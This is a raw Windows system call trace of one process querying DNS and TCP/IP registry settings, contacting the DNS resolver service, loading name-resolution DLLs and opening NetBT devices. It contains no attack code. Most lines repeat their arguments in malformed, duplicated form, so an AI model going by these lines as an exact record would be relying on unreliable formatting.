 04744   712   NtQueryValueKey  (676,  (676, "DefaultRegistrationRefreshInterval", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04745   712   NtQueryValueKey  (672,  (672, "RegistrationMaxAddressCount", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04746   712   NtQueryValueKey  (676,  (676, "MaxNumberOfAddressesToRegister", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04747   712   NtQueryValueKey  (672,  (672, "UpdateSecurityLevel", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04748   712   NtQueryValueKey  (676,  (676, "UpdateSecurityLevel", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04749   712   NtQueryValueKey  (672,  (672, "UpdateZoneExcludeFile", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04750   712   NtQueryValueKey  (672,  (672, "UpdateTopLevelDomainZones", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04751   712   NtQueryValueKey  (672,  (672, "DnsTest", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04752   712   NtQueryValueKey  (672,  (672, "MaxCacheSize", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04753   712   NtQueryValueKey  (672,  (672, "MaxCacheTtl", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04754   712   NtQueryValueKey  (672,  (672, "MaxNegativeCacheTtl", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04755   712   NtQueryValueKey  (672,  (672, "AdapterTimeoutLimit", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04756   712   NtQueryValueKey  (672,  (672, "ServerPriorityTimeLimit", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04757   712   NtQueryValueKey  (672,  (672, "MaxCachedSockets", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04758   712   NtQueryValueKey  (672,  (672, "UseMulticast", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04759   712   NtQueryValueKey  (672,  (672, "MulticastOnNameError", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04760   712   NtQueryValueKey  (672,  (672, "UseDotLocalDomain", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04761   712   NtQueryValueKey  (672,  (672, "ListenOnMulticast", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04762   712   NtOpenKey  (0x1, {24, 48, 0x40, 0, 0,  (0x1, {24, 48, 0x40, 0, 0, "System\Setup"}, ... 680, ) }, ... 680, ) == 0x0
 04763   712   NtQueryValueKey  (680,  (680, "SystemSetupInProgress", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (680, "SystemSetupInProgress", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 04764   712   NtClose  (680, ... ) == 0x0
 04765   712   NtClose  (676, ... ) == 0x0
 04766   712   NtClose  (672, ... ) == 0x0
 04767   712   NtOpenKey  (0x1, {24, 48, 0x40, 0, 0,  (0x1, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Services\Tcpip\Parameters"}, ... 672, ) }, ... 672, ) == 0x0
 04768   712   NtQueryValueKey  (672,  (672, "DnsQueryTimeouts", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04769   712   NtQueryValueKey  (672,  (672, "DnsQuickQueryTimeouts", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04770   712   NtQueryValueKey  (672,  (672, "DnsMulticastQueryTimeouts", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04771   712   NtClose  (672, ... ) == 0x0
 04772   712   NtCreateEvent  (0x1f0003, 0x0, 1, 0, ... 672, ) == 0x0
 04773   712   NtConnectPort  ( ("\RPC Control\DNSResolver", {12, 2, 1, 1}, 0x0, 0x0, 24703212, 112, ... 676, 0x0, 0x0, 0x0, 112, ) , {12, 2, 1, 1}, 0x0, 0x0, 24703212, 112, ... 676, 0x0, 0x0, 0x0, 112, ) == 0x0
 04774   712   NtRequestWaitReplyPort  (676, {128, 152, new_msg, 0, 1310720, 126656, 1310720, 24702976}  (676, {128, 152, new_msg, 0, 1310720, 126656, 1310720, 24702976} "\0$\370w\260\366x\1\2$\370w\1kwEVY\205D\237\200\364(\367\326\1)\2\0\0\0\1\0\0\0\240h\27\0\4\0\0\0\240h\27\0\20\344\314w\240h\27\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\4\0P\253\27\0\340f\27\0\0\0\0\0\330f\27\0\0g\27\0ph\27\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\350\6\0\0" ... {128, 152, reply, 0, 452, 712, 1582, 0} "\7$\370w\260\366x\1\2$\370w\1kwEVY\205D\237\200\364(\367\326\1)\2\0\0\0\1\0\0\0\0\0\0\0\4\0\0\0\240h\27\0\377\377\377\377\240h\27\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\4\0P\253\27\0\340f\27\0\0\0\0\0\330f\27\0\0g\27\0ph\27\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\350\6\0\0" )  ... {128, 152, reply, 0, 452, 712, 1582, 0}  (676, {128, 152, new_msg, 0, 1310720, 126656, 1310720, 24702976} "\0$\370w\260\366x\1\2$\370w\1kwEVY\205D\237\200\364(\367\326\1)\2\0\0\0\1\0\0\0\240h\27\0\4\0\0\0\240h\27\0\20\344\314w\240h\27\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\4\0P\253\27\0\340f\27\0\0\0\0\0\330f\27\0\0g\27\0ph\27\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\350\6\0\0" ... {128, 152, reply, 0, 452, 712, 1582, 0} "\7$\370w\260\366x\1\2$\370w\1kwEVY\205D\237\200\364(\367\326\1)\2\0\0\0\1\0\0\0\0\0\0\0\4\0\0\0\240h\27\0\377\377\377\377\240h\27\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\4\0P\253\27\0\340f\27\0\0\0\0\0\330f\27\0\0g\27\0ph\27\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\350\6\0\0" )  ) == 0x0
 04775   712   NtRequestWaitReplyPort  (676, {64, 88, new_msg, 0, 44, 13, 20, 0}  (676, {64, 88, new_msg, 0, 44, 13, 20, 0} "\1\0\0\0A\2\10\0\351?\334\21\261\310\0\14)\371\246\305\1\0\0\0\377\377\377\377\1\0\0\0\0\0\0\0\21\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\3757B@\335\350\344\34C\27\122" ... {52, 76, reply, 0, 452, 712, 1583, 0} "\2`\372\177\1\00\300\0\0\0\0\346\5\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\300\34\13\0\1\0\0\0\1\0\0\0\300\250|\201\377\377\377\0" )  ... {52, 76, reply, 0, 452, 712, 1583, 0}  (676, {64, 88, new_msg, 0, 44, 13, 20, 0} "\1\0\0\0A\2\10\0\351?\334\21\261\310\0\14)\371\246\305\1\0\0\0\377\377\377\377\1\0\0\0\0\0\0\0\21\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\3757B@\335\350\344\34C\27\122" ... {52, 76, reply, 0, 452, 712, 1583, 0} "\2`\372\177\1\00\300\0\0\0\0\346\5\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\300\34\13\0\1\0\0\0\1\0\0\0\300\250|\201\377\377\377\0" )  ) == 0x0
 04776   712   NtCreateKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Services\Tcpip\Parameters"}, 0, "Class", 0, ... 680, 2, ) }, 0,  (0x20019, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Services\Tcpip\Parameters"}, 0, "Class", 0, ... 680, 2, ) , 0, ... 680, 2, ) == 0x0
 04777   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Services\DnsCache\Parameters"}, ... 684, ) }, ... 684, ) == 0x0
 04778   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Policies\Microsoft\Windows NT\DnsClient"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04779   712   NtQueryValueKey  (680,  (680, "Hostname", Partial, 144, ... TitleIdx=0, Type=1, Data="M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 28, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (680, "Hostname", Partial, 144, ... TitleIdx=0, Type=1, Data="M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 28, ) }, 28, ) == 0x0
 04780   712   NtQueryValueKey  (680,  (680, "Hostname", Partial, 144, ... TitleIdx=0, Type=1, Data="M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 28, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (680, "Hostname", Partial, 144, ... TitleIdx=0, Type=1, Data="M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 28, ) }, 28, ) == 0x0
 04781   712   NtClose  (680, ... ) == 0x0
 04782   712   NtClose  (684, ... ) == 0x0
 04783   712   NtRequestWaitReplyPort  (676, {44, 68, new_msg, 0, 452, 712, 1583, 0}  (676, {44, 68, new_msg, 0, 452, 712, 1583, 0} "\1`\0\0A\2\4\0\0\0\0\0\346\5\0\0\0\0\0\0\0\0\0\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0" ... {40, 64, reply, 0, 452, 712, 1584, 0} "\2f>\341\4\0\0\0\210\313-\370\0\0\0\0\37\0\0\0\5\0\0\0\0\16W\200\0\0\0\0\324\1\0\0\0f\12\0" )  ... {40, 64, reply, 0, 452, 712, 1584, 0}  (676, {44, 68, new_msg, 0, 452, 712, 1583, 0} "\1`\0\0A\2\4\0\0\0\0\0\346\5\0\0\0\0\0\0\0\0\0\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0" ... {40, 64, reply, 0, 452, 712, 1584, 0} "\2f>\341\4\0\0\0\210\313-\370\0\0\0\0\37\0\0\0\5\0\0\0\0\16W\200\0\0\0\0\324\1\0\0\0f\12\0" )  ) == 0x0
 04784   712   NtRequestWaitReplyPort  (676, {64, 88, new_msg, 56, 0, 1, 0, 0}  (676, {64, 88, new_msg, 56, 0, 1, 0, 0} "\10\362x\1@\0\314w\350\252\27\0,\362x\1\224\362x\1\0\267\362v\224\362x\1\350\252\27\0\1\0\0\0\20\342\24\0\324\1\0\0\324\1\0\0\0f\12\0\0\0\0\0\0\0\0\0\0\0\0\0" ... {64, 88, reply, 56, 452, 712, 1585, 0} "\10\362x\1@\0\314w\350\252\27\0,\362x\1\224\362x\1\0\267\362v\224\362x\1\350\252\27\0\1\0\0\0\20\342\24\0\324\1\0\0\324\1\0\0\0f\12\0\0\0\0\0\0\0\0\0\0\0\0\0" )  ... {64, 88, reply, 56, 452, 712, 1585, 0}  (676, {64, 88, new_msg, 56, 0, 1, 0, 0} "\10\362x\1@\0\314w\350\252\27\0,\362x\1\224\362x\1\0\267\362v\224\362x\1\350\252\27\0\1\0\0\0\20\342\24\0\324\1\0\0\324\1\0\0\0f\12\0\0\0\0\0\0\0\0\0\0\0\0\0" ... {64, 88, reply, 56, 452, 712, 1585, 0} "\10\362x\1@\0\314w\350\252\27\0,\362x\1\224\362x\1\0\267\362v\224\362x\1\350\252\27\0\1\0\0\0\20\342\24\0\324\1\0\0\324\1\0\0\0f\12\0\0\0\0\0\0\0\0\0\0\0\0\0" )  ) == 0x0
 04785   712   NtCreateKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Services\Tcpip\Parameters"}, 0, "Class", 0, ... 684, 2, ) }, 0,  (0x20019, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Services\Tcpip\Parameters"}, 0, "Class", 0, ... 684, 2, ) , 0, ... 684, 2, ) == 0x0
 04786   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Services\DnsCache\Parameters"}, ... 680, ) }, ... 680, ) == 0x0
 04787   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Policies\Microsoft\Windows NT\DnsClient"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04788   712   NtQueryValueKey  (684,  (684, "Domain", Partial, 144, ... TitleIdx=0, Type=1, Data="\0\0"}, 14, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (684, "Domain", Partial, 144, ... TitleIdx=0, Type=1, Data="\0\0"}, 14, ) }, 14, ) == 0x0
 04789   712   NtQueryValueKey  (684,  (684, "Domain", Partial, 144, ... TitleIdx=0, Type=1, Data="\0\0"}, 14, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (684, "Domain", Partial, 144, ... TitleIdx=0, Type=1, Data="\0\0"}, 14, ) }, 14, ) == 0x0
 04790   712   NtClose  (684, ... ) == 0x0
 04791   712   NtClose  (680, ... ) == 0x0
 04792   712   NtOpenKey  (0x1, {24, 48, 0x40, 0, 0,  (0x1, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Services\Tcpip\Parameters"}, ... 680, ) }, ... 680, ) == 0x0
 04793   712   NtQueryValueKey  (680,  (680, "DnsNbtLookupOrder", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04794   712   NtClose  (680, ... ) == 0x0
 04795   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\winrnr.dll"}, 24702620, ... ) }, 24702620, ... ) == 0x0
 04796   712   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\winrnr.dll"}, 5, 96, ... 680, {status=0x0, info=1}, ) }, 5, 96, ... 680, {status=0x0, info=1}, ) == 0x0
 04797   712   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 680, ... 684, ) == 0x0
 04798   712   NtClose  (680, ... ) == 0x0
 04799   712   NtMapViewOfSection  (684, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0x17b0000), 0x0, 16384, ) == 0x0
 04800   712   NtClose  (684, ... ) == 0x0
 04801   712   NtUnmapViewOfSection  (-1, 0x17b0000, ... ) == 0x0
 04802   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\winrnr.dll"}, 24702936, ... ) }, 24702936, ... ) == 0x0
 04803   712   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\winrnr.dll"}, 5, 96, ... 684, {status=0x0, info=1}, ) }, 5, 96, ... 684, {status=0x0, info=1}, ) == 0x0
 04804   712   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 684, ... 680, ) == 0x0
 04805   712   NtQuerySection  (680, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 04806   712   NtClose  (684, ... ) == 0x0
 04807   712   NtMapViewOfSection  (680, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x76fb0000), 0x0, 28672, ) == 0x0
 04808   712   NtClose  (680, ... ) == 0x0
 04809   712   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "WLDAP32.dll"}, ... 680, ) }, ... 680, ) == 0x0
 04810   712   NtMapViewOfSection  (680, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x76f60000), 0x0, 180224, ) == 0x0
 04811   712   NtClose  (680, ... ) == 0x0
 04812   712   NtCreateEvent  (0x1f0003, 0x0, 1, 0, ... 680, ) == 0x0
 04813   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Services\LDAP"}, ... 684, ) }, ... 684, ) == 0x0
 04814   712   NtQueryValueKey  (684,  (684, "LdapClientIntegrity", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (684, "LdapClientIntegrity", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 04815   712   NtClose  (684, ... ) == 0x0
 04816   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\mswsock.dll"}, 24702620, ... ) }, 24702620, ... ) == 0x0
 04817   712   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 04818   712   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 24838144, 65536, ) == 0x0
 04819   712   NtAllocateVirtualMemory  (-1, 24838144, 0, 4096, 4096, 4, ... 24838144, 4096, ) == 0x0
 04820   712   NtAllocateVirtualMemory  (-1, 24842240, 0, 8192, 4096, 4, ... 24842240, 8192, ) == 0x0
 04821   712   NtRequestWaitReplyPort  (676, {64, 88, new_msg, 0, 452, 712, 1584, 0}  (676, {64, 88, new_msg, 0, 452, 712, 1584, 0} "\1f\0\0A\2\10\0\210\313-\370\0\0\0\0\37\0\0\0\5\0\0\0\377\377\377\377\0\0\0\0\0\0\0\0\21\0\0\0\0\0\0\0\0\0\0\0\377\377\377\0\3757B@\335\350\344\34C\27\122" ... {52, 76, reply, 0, 452, 712, 1586, 0} "\2`\372\177\1\00\300\0\0\0\0\346\5\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\300\34\13\0\1\0\0\0\1\0\0\0\300\250|\201\377\377\377\0" )  ... {52, 76, reply, 0, 452, 712, 1586, 0}  (676, {64, 88, new_msg, 0, 452, 712, 1584, 0} "\1f\0\0A\2\10\0\210\313-\370\0\0\0\0\37\0\0\0\5\0\0\0\377\377\377\377\0\0\0\0\0\0\0\0\21\0\0\0\0\0\0\0\0\0\0\0\377\377\377\0\3757B@\335\350\344\34C\27\122" ... {52, 76, reply, 0, 452, 712, 1586, 0} "\2`\372\177\1\00\300\0\0\0\0\346\5\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\300\34\13\0\1\0\0\0\1\0\0\0\300\250|\201\377\377\377\0" )  ) == 0x0
 04822   712   NtCreateKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Services\Tcpip\Parameters"}, 0, "Class", 0, ... 684, 2, ) }, 0,  (0x20019, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Services\Tcpip\Parameters"}, 0, "Class", 0, ... 684, 2, ) , 0, ... 684, 2, ) == 0x0
 04823   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Services\DnsCache\Parameters"}, ... 688, ) }, ... 688, ) == 0x0
 04824   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Policies\Microsoft\Windows NT\DnsClient"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04825   712   NtQueryValueKey  (684,  (684, "Hostname", Partial, 144, ... TitleIdx=0, Type=1, Data="M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 28, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (684, "Hostname", Partial, 144, ... TitleIdx=0, Type=1, Data="M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 28, ) }, 28, ) == 0x0
 04826   712   NtQueryValueKey  (684,  (684, "Hostname", Partial, 144, ... TitleIdx=0, Type=1, Data="M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 28, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (684, "Hostname", Partial, 144, ... TitleIdx=0, Type=1, Data="M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 28, ) }, 28, ) == 0x0
 04827   712   NtClose  (684, ... ) == 0x0
 04828   712   NtClose  (688, ... ) == 0x0
 04829   712   NtCreateKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Services\Tcpip\Parameters"}, 0, "Class", 0, ... 688, 2, ) }, 0,  (0x20019, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Services\Tcpip\Parameters"}, 0, "Class", 0, ... 688, 2, ) , 0, ... 688, 2, ) == 0x0
 04830   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Services\DnsCache\Parameters"}, ... 684, ) }, ... 684, ) == 0x0
 04831   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Policies\Microsoft\Windows NT\DnsClient"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04832   712   NtQueryValueKey  (688,  (688, "Domain", Partial, 144, ... TitleIdx=0, Type=1, Data="\0\0"}, 14, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (688, "Domain", Partial, 144, ... TitleIdx=0, Type=1, Data="\0\0"}, 14, ) }, 14, ) == 0x0
 04833   712   NtQueryValueKey  (688,  (688, "Domain", Partial, 144, ... TitleIdx=0, Type=1, Data="\0\0"}, 14, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (688, "Domain", Partial, 144, ... TitleIdx=0, Type=1, Data="\0\0"}, 14, ) }, 14, ) == 0x0
 04834   712   NtClose  (688, ... ) == 0x0
 04835   712   NtClose  (684, ... ) == 0x0
 04836   712   NtOpenKey  (0x1, {24, 48, 0x40, 0, 0,  (0x1, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Services\VxD\MSTCP"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04837   712   NtOpenKey  (0x1, {24, 48, 0x40, 0, 0,  (0x1, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Control\ComputerName\ComputerName"}, ... 684, ) }, ... 684, ) == 0x0
 04838   712   NtQueryValueKey  (684,  (684, "ComputerName", Partial, 144, ... TitleIdx=0, Type=1, Data="M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 28, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (684, "ComputerName", Partial, 144, ... TitleIdx=0, Type=1, Data="M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 28, ) }, 28, ) == 0x0
 04839   712   NtQueryValueKey  (684,  (684, "ComputerName", Partial, 144, ... TitleIdx=0, Type=1, Data="M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 28, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (684, "ComputerName", Partial, 144, ... TitleIdx=0, Type=1, Data="M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 28, ) }, 28, ) == 0x0
 04840   712   NtClose  (684, ... ) == 0x0
 04841   712   NtWaitForSingleObject  (464, 0, {0, 0}, ... ) == 0x102
 04842   712   NtWaitForSingleObject  (464, 0, {0, 0}, ... ) == 0x102
 04843   712   NtWaitForSingleObject  (464, 0, {0, 0}, ... ) == 0x102
 04844   712   NtWaitForSingleObject  (476, 0, {0, 0}, ... ) == 0x102
 04845   712   NtRequestWaitReplyPort  (676, {88, 112, new_msg, 0, 452, 712, 1586, 0}  (676, {88, 112, new_msg, 0, 452, 712, 1586, 0} "\1`\0\0A\2\11\0\0\0\0\0\346\5\0\0\0\0\0\0\0\0\0\0\377\377\377\377\0\0\0\0\0\0\0\0\264y\27\0\11\0\0\0\0\0\0\0\11\0\0\0k\08\0l\0.\0i\0n\0f\0o\0\0\0\1\0\0\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0" ... {44, 68, reply, 0, 452, 712, 1587, 0} "\2f>\341\1\0\0\0\210\313-\370\0\0\0\0\37\0\0\0\5\0\0\0\0\16W\200\0\0\0\0\0\0\0\0\264\5\0\0\1\0\0\0" )  ... {44, 68, reply, 0, 452, 712, 1587, 0}  (676, {88, 112, new_msg, 0, 452, 712, 1586, 0} "\1`\0\0A\2\11\0\0\0\0\0\346\5\0\0\0\0\0\0\0\0\0\0\377\377\377\377\0\0\0\0\0\0\0\0\264y\27\0\11\0\0\0\0\0\0\0\11\0\0\0k\08\0l\0.\0i\0n\0f\0o\0\0\0\1\0\0\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0" ... {44, 68, reply, 0, 452, 712, 1587, 0} "\2f>\341\1\0\0\0\210\313-\370\0\0\0\0\37\0\0\0\5\0\0\0\0\16W\200\0\0\0\0\0\0\0\0\264\5\0\0\1\0\0\0" )  ) == 0x0
 04846   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "SYSTEM\CurrentControlSet\Services\NetBT\Linkage"}, ... 684, ) }, ... 684, ) == 0x0
 04847   712   NtQueryValueKey  (684,  (684, "Export", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 04848   712   NtQueryValueKey  (684,  (684, "Export", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 04849   712   NtQueryValueKey  (684,  (684, "Export", Partial, 368, ... TitleIdx=0, Type=7, Data="\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\04\0F\0E\05\07\0D\07\0B\0-\00\03\0A\05\0-\04\08\0B\02\0-\08\01\01\0C\0-\0C\09\02\0D\0B\08\01\03\08\07\0E\00\0}\0\0\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0A\0B\0E\07\0E\00\06\0F\0-\06\02\00\0F\0-\04\0E\0A\0A\0-\0A\0E\07\0D\0-\04\01\04\07\06\0D\04\0C\0C\0F\01\04\0}\0\0\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0D\01\09\0D\0F\08\08\02\0-\0A\09\0C\0B\0-\04\01\04\04\0-\08\03\00\07\0-\05\0C\00\0D\00\03\06\08\0D\0E\01\0A\0}\0\0\0\0\0"}, 368, ) , Partial, 368, ... TitleIdx=0, Type=7, Data= (684, "Export", Partial, 368, ... TitleIdx=0, Type=7, Data="\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\04\0F\0E\05\07\0D\07\0B\0-\00\03\0A\05\0-\04\08\0B\02\0-\08\01\01\0C\0-\0C\09\02\0D\0B\08\01\03\08\07\0E\00\0}\0\0\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0A\0B\0E\07\0E\00\06\0F\0-\06\02\00\0F\0-\04\0E\0A\0A\0-\0A\0E\07\0D\0-\04\01\04\07\06\0D\04\0C\0C\0F\01\04\0}\0\0\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0D\01\09\0D\0F\08\08\02\0-\0A\09\0C\0B\0-\04\01\04\04\0-\08\03\00\07\0-\05\0C\00\0D\00\03\06\08\0D\0E\01\0A\0}\0\0\0\0\0"}, 368, ) }, 368, ) == 0x0
 04850   712   NtCreateFile  (0x20100000, {24, 0, 0x40, 0, 0,  (0x20100000, {24, 0, 0x40, 0, 0, "\Device\NetBT_Tcpip_{4FE57D7B-03A5-48B2-811C-C92DB81387E0}"}, 0x0, 0, 3, 3, 0, 0, 0, ... 688, {status=0x0, info=0}, ) }, 0x0, 0, 3, 3, 0, 0, 0, ... 688, {status=0x0, info=0}, ) == 0x0
 04851   712   NtCreateFile  (0x20100000, {24, 0, 0x40, 0, 0,  (0x20100000, {24, 0, 0x40, 0, 0, "\Device\NetBT_Tcpip_{ABE7E06F-620F-4EAA-AE7D-41476D4CCF14}"}, 0x0, 0, 3, 3, 0, 0, 0, ... ) }, 0x0, 0, 3, 3, 0, 0, 0, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
